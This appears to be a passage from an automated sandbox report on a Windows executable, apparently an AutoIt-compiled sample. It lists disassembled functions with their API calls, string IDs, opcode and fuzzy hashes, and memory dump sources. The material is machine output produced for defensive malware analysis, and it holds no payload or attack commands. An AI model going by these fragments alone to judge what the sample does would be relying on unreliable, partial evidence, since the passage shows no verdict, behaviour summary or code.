                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: LengthMessageSendTextWindow
                                                                                                                                                                                                                • String ID: edit
                                                                                                                                                                                                                • API String ID: 2978978980-2167791130
                                                                                                                                                                                                                • Opcode ID: 458bf78cb5436efb918afa53a1743a3d6784074bbf07c1e17ba5dfdf6e920bd9
                                                                                                                                                                                                                • Instruction ID: 5a0e340068a0ba28dc4d1c90c86d8b7761b767731f3a1bde811fb9e5560a91dc
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 458bf78cb5436efb918afa53a1743a3d6784074bbf07c1e17ba5dfdf6e920bd9
                                                                                                                                                                                                                • Instruction Fuzzy Hash: BB2190761102056BEB108F68D894FEB33ADEB89339F10471AFD64D36E1C279DC458B68
                                                                                                                                                                                                                Function 00476CA4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72sleepCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • Sleep.KERNEL32(00000000), ref: 00476CB0
                                                                                                                                                                                                                • GlobalMemoryStatusEx.KERNEL32 ref: 00476CC3
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: GlobalMemorySleepStatus
                                                                                                                                                                                                                • String ID: @
                                                                                                                                                                                                                • API String ID: 2783356886-2766056989
                                                                                                                                                                                                                • Opcode ID: e336f3d3cf010bdb765bf3cd25e4316ec625df5f035adc8ff92848a8f4c166eb
                                                                                                                                                                                                                • Instruction ID: 7847cb5f82098321599ebf91c79b9dffd15eff11c36c925ad8cec94a5f412430
                                                                                                                                                                                                                • Opcode Fuzzy Hash: e336f3d3cf010bdb765bf3cd25e4316ec625df5f035adc8ff92848a8f4c166eb
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 67217130508F0497C211BF6AAC4AB5E7BB8AF84B15F01886DF9C8A14D1DF745528C76F
                                                                                                                                                                                                                Function 00465225 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 61networkCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: htonsinet_addr
                                                                                                                                                                                                                • String ID: 255.255.255.255
                                                                                                                                                                                                                • API String ID: 3832099526-2422070025
                                                                                                                                                                                                                • Opcode ID: bffbf838f8b6926ef71edb3efae5563a838ccfa537518f0e0f8b175b1623bbd9
                                                                                                                                                                                                                • Instruction ID: fb726eff09ff94cff080b531f734a3fd27281744828c6f3d0166551fa69e616e
                                                                                                                                                                                                                • Opcode Fuzzy Hash: bffbf838f8b6926ef71edb3efae5563a838ccfa537518f0e0f8b175b1623bbd9
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5211E732600304ABCF10DF69EC85FAA73A8EF45324F04455BF9049B392D635E4518B59
                                                                                                                                                                                                                Function 0044256C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 59networkCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 004425F8
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: InternetOpen
                                                                                                                                                                                                                • String ID: <local>
                                                                                                                                                                                                                • API String ID: 2038078732-4266983199
                                                                                                                                                                                                                • Opcode ID: 84bf365b150010c194f632228c20f1475d6fe654e04a12f862fc2198fde258ef
                                                                                                                                                                                                                • Instruction ID: 93d8b03a482712ff69e4757b1f2b0d1c201104d099b6cd2898bf81ba059b6d15
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 84bf365b150010c194f632228c20f1475d6fe654e04a12f862fc2198fde258ef
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9311C270680710BAF720CB548E62FBA77E8BB24B01F50844BF9429B6C0D6F4B944D7A9
                                                                                                                                                                                                                Function 004321A4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 50COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: __fread_nolock_memmove
                                                                                                                                                                                                                • String ID: EA06
                                                                                                                                                                                                                • API String ID: 1988441806-3962188686
                                                                                                                                                                                                                • Opcode ID: e45c56eab20c3bcfe4a359df8a9ba3729120cfe0f4e9d091ae644268b7df8977
                                                                                                                                                                                                                • Instruction ID: b3ef0f2836274d974f80c1c05754fec17bf4118f678989acdc9742ef3c25ced0
                                                                                                                                                                                                                • Opcode Fuzzy Hash: e45c56eab20c3bcfe4a359df8a9ba3729120cfe0f4e9d091ae644268b7df8977
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7D014971904228ABCF18DB99DC56EFEBBF49F55301F00859EF59793281D578A708CBA0
                                                                                                                                                                                                                Function 00442BB4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: _memmove
                                                                                                                                                                                                                • String ID: u,D
                                                                                                                                                                                                                • API String ID: 4104443479-3858472334
                                                                                                                                                                                                                • Opcode ID: a09dc1741948e98e7df597fac067bc9d4c41fa761799cf9fa5b02ea5b7d8fd51
                                                                                                                                                                                                                • Instruction ID: 1e149f93898fe9afff494952afced4f728167d7c2cca3c00b97e401526751dc1
                                                                                                                                                                                                                • Opcode Fuzzy Hash: a09dc1741948e98e7df597fac067bc9d4c41fa761799cf9fa5b02ea5b7d8fd51
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4FF04C722007045AE3149E6ADC41FD7B7ECDBD8714F50442EF74997241E1B8A9858764
                                                                                                                                                                                                                Function 00401B10 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 41COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • _wcslen.LIBCMT ref: 00401B11
                                                                                                                                                                                                                  • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                                                                                                                                                                • _memmove.LIBCMT ref: 00401B57
                                                                                                                                                                                                                  • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
                                                                                                                                                                                                                  • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
                                                                                                                                                                                                                  • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: std::exception::exception$Exception@8Throw_malloc_memmove_wcslen
                                                                                                                                                                                                                • String ID: @EXITCODE
                                                                                                                                                                                                                • API String ID: 2734553683-3436989551
                                                                                                                                                                                                                • Opcode ID: b6d17f11840b334af4eb2c0dc4703dd6ec7fe6b5974f9b569570c14fa5f7c58b
                                                                                                                                                                                                                • Instruction ID: 16ac7666fc6b8d0cd4c8082de1062d74cbdf630d8e5b0a9ec9a55ac2b86b5c72
                                                                                                                                                                                                                • Opcode Fuzzy Hash: b6d17f11840b334af4eb2c0dc4703dd6ec7fe6b5974f9b569570c14fa5f7c58b
                                                                                                                                                                                                                • Instruction Fuzzy Hash: D5F0CDF2B00641AFD720DB36DC02B6775E49B84308F04883EA24BC6795FA7DE4828B14
                                                                                                                                                                                                                Function 004560F2 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 36windowCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • SendMessageW.USER32(?,00001001,00000000,?), ref: 004560FE
                                                                                                                                                                                                                  • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                                                                                                                                                                • wsprintfW.USER32 ref: 0045612A
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: MessageSend_mallocwsprintf
                                                                                                                                                                                                                • String ID: %d/%02d/%02d
                                                                                                                                                                                                                • API String ID: 1262938277-328681919
                                                                                                                                                                                                                • Opcode ID: 0791508f4d5d4d8a4d88f52051df625728301e413c657ab928a68c4181838543
                                                                                                                                                                                                                • Instruction ID: 953f6dd97ce98099cbba652085d0304866be84a46252058ffc4865c1a62d2123
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0791508f4d5d4d8a4d88f52051df625728301e413c657ab928a68c4181838543
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9DF0823274022866D7109BD9AD42FBEB3A8DB49762F00416BFE08E9180E6694854C3B9
                                                                                                                                                                                                                Function 00442651 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22networkCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • InternetCloseHandle.WININET(?), ref: 00442663
                                                                                                                                                                                                                • InternetCloseHandle.WININET ref: 00442668
                                                                                                                                                                                                                  • Part of subcall function 004319AC: WaitForSingleObject.KERNEL32(aeB,?,?,00442688,aeB,00002710,?,?,00426561,?,?,0040F19D), ref: 004319BD
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: CloseHandleInternet$ObjectSingleWait
                                                                                                                                                                                                                • String ID: aeB
                                                                                                                                                                                                                • API String ID: 857135153-906807131
                                                                                                                                                                                                                • Opcode ID: c8224cb77d174d98af0e1b6511dcd9cd22ae279780c4dc09588970c0e039578a
                                                                                                                                                                                                                • Instruction ID: 0fa74210230a71b56b5a48e3a0e63043fcf8dca502afcbd281d0c2380f7acdeb
                                                                                                                                                                                                                • Opcode Fuzzy Hash: c8224cb77d174d98af0e1b6511dcd9cd22ae279780c4dc09588970c0e039578a
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 46E0E67650071467D310AF9ADC00B4BF7DC9F95724F11482FEA4497650C6B5B4408BA4
                                                                                                                                                                                                                Function 00441BE8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 17windowCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00441BFE
                                                                                                                                                                                                                • PostMessageW.USER32(00000000), ref: 00441C05
                                                                                                                                                                                                                  • Part of subcall function 004331A2: Sleep.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331B9
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: FindMessagePostSleepWindow
                                                                                                                                                                                                                • String ID: Shell_TrayWnd
                                                                                                                                                                                                                • API String ID: 529655941-2988720461
                                                                                                                                                                                                                • Opcode ID: 45e518b183cc50fc9cae19d0f51122c68363ee0c98c893ad2541c3bd761d7025
                                                                                                                                                                                                                • Instruction ID: aba4e04af0122a293c2d26b46e7c49f9db856b5fc79b6d6ac13cebee95b63d36
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 45e518b183cc50fc9cae19d0f51122c68363ee0c98c893ad2541c3bd761d7025
                                                                                                                                                                                                                • Instruction Fuzzy Hash: EFD0A772BC13013BFA6077745D0FF8B66145B14711F000C3A7B42E61C1D4F8E4018758
                                                                                                                                                                                                                Function 00441C20 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 17windowCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00441C2A
                                                                                                                                                                                                                • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00441C3D
                                                                                                                                                                                                                  • Part of subcall function 004331A2: Sleep.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331B9
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: FindMessagePostSleepWindow
                                                                                                                                                                                                                • String ID: Shell_TrayWnd
                                                                                                                                                                                                                • API String ID: 529655941-2988720461
                                                                                                                                                                                                                • Opcode ID: 2c92ce268d6dea70ed1d9c93ac972332f86dd545b3a9023bb22b3be85c6f7e29
                                                                                                                                                                                                                • Instruction ID: e91d5bd0f3095d95abf168919443ed1e5ef8457e9bc9ee6dadeb2d3358a759b2
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2c92ce268d6dea70ed1d9c93ac972332f86dd545b3a9023bb22b3be85c6f7e29
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 61D0A772B843017BFA6077745D0FF8B66145B14711F000C3A7B46A61C1D4F8D4018758
                                                                                                                                                                                                                Function 004370C3 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 8windowCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 004370D1
                                                                                                                                                                                                                  • Part of subcall function 004118DA: _doexit.LIBCMT ref: 004118E6
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Message_doexit
                                                                                                                                                                                                                • String ID: AutoIt$Error allocating memory.
                                                                                                                                                                                                                • API String ID: 1993061046-4017498283
                                                                                                                                                                                                                • Opcode ID: a805162a0f5c9c87f8277766c6d2ca4cce7c6123580b1b409358537ccd51af94
                                                                                                                                                                                                                • Instruction ID: aa36ec6b1cc278624b5c670a1a0522bf80bf1016c56dd6686bcadf549e8ac499
                                                                                                                                                                                                                • Opcode Fuzzy Hash: a805162a0f5c9c87f8277766c6d2ca4cce7c6123580b1b409358537ccd51af94
                                                                                                                                                                                                                • Instruction Fuzzy Hash: F1B092323C030627E50437910D0BF9D26003B64F02F220C067324280D204C90090131D